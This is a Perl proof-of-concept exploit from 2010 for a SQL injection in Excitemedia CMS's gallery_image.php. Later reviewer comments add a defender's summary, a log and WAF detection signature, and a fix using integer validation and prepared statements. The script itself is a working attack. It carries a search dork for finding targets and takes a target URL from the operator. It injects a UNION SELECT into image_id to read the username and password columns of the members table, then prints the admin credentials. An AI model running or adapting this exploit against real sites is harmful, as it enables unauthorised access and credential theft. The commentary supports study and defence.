1 #!/usr/bin/perl −w
2
3 # Excitemedia CMS Sql injection vulnerability #
4 ########################################
5 #[+] Author : Dr.0rYX AND Cr3W−DZ
6 #[+] Greetz : HIS0K4 − claw and all the other friends
7 #[+] inurl:M−^Tgallery_image.php?image_id=M−^T
8 #[+] Vendor: http://www.excitemedia.com.au
9 #[+] sell script with host
10 ########################################
# Purpose: proof-of-concept for the SQL injection named in the header. It sends
# one crafted GET request to gallery_image.php under a base URL typed by the
# operator and prints any username/password text found in the response body.
# NOTE(review): the leading line numbers and the typographic dash/quote
# characters in this listing are artefacts of the print rendering.
#
# Defender's summary of what is visible below:
#   - entry point : the image_id query parameter of gallery_image.php
#   - technique   : UNION-based SELECT appended to that parameter
#   - data read   : username and password columns of the members table
#   - fix         : accept image_id only as an integer and pass it to the
#                   database through a bound parameter / prepared statement

# Banner and credits only; these prints have no effect on the request.
11 print "\t\t| NORTH−AFRICA SECURITY TEAM |\n\n";
12 print "[x] Dr.0rYX AND Cr3W−DZ\n\n";
13 print "[x] N.A.S.T\n\n";
14 print "[x] Excitemedia Cms Sql injection vulnerability\n\n";
15 print "[x] www.nasteam.wordpress.com\n\n";
16 print "\t\t| vx3[at]hotmail.de |\n\n";
17 print "\t\t| cr3w[at]hotmail.de |\n\n";
# HTTP client used for the single request made further down.
18 use LWP::UserAgent;
# The base URL is read interactively and is concatenated into the request URL
# without any validation.
19 print "\nTarget page:[http://site/path/]: ";
20 chomp(my $target=<STDIN>);
# Expression placed in the injected SELECT. The hex literals are ASCII for
# "user=" (0x757365723d), ":" (0x3a) and "password=" (0x70617373776f72643d);
# they are the markers the two regexes at the end search for.
# Detection: "union select" together with "concat(0x" inside the image_id
# parameter is a usable signature in access logs or a WAF rule for this PoC.
21 $column_name="concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)";
# Table the injected SELECT reads from.
22 $table_name="members";
# Client object with a fixed browser User-Agent. The string is a common one, so
# it is a weak indicator alone; correlate it with the query pattern above.
23 $b = LWP::UserAgent−>new() or die "Could not initialize browser\n";
24 $b−>agent(’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);
# Request URL: image_id carries "1 and 1=0" (so the original query returns no
# row), then an 8-column UNION SELECT with the marker expression in column 3,
# "limit 0,1" and a trailing SQL comment. The string literal continues over the
# next three lines of the listing.
# NOTE(review): this only works if the server builds its SQL by concatenating
# image_id unvalidated; the server code is not shown here, so confirm there.
25 $host = $target."/gallery_image.php?image_id=1 and 1=0 union select 1,2,".$column_name.",4,5,6,7,8 from ".$table_name."
26
27
limit 0,1−−";
# One GET request; the response status is never checked.
28 $res = $b−>request(HTTP::Request−>new(GET=>$host));
# Search the body for the "user=" marker and print the text up to the ":".
29 $answer = $res−>content; if ($answer =~ /user=(.*?):/){
30 print "\n[+] Admin username : $1\n\n";
31 }
32 else{print "\nError\n";
33 }
# Same body again: print the text between "password=" and the next "</div>".
# Presumably column 3 of the result is rendered inside a <div>; confirm against
# the page template.
# NOTE(review): the listing does not show whether this column holds cleartext or
# a hash. Storing passwords as salted, slow hashes limits what a leak of this
# column gives away.
34 $answer = $res−>content; if ($answer =~ /password=(.*?)<\/div>/){
35 print "\n[+] Admin password : $1\n\n";
36 }
37 else{print "\nError\n";
38 }
Excitemedia CMS SQL Injection Vulnerability
Dr.0rYX AND Cr3W−DZ
04/23/2010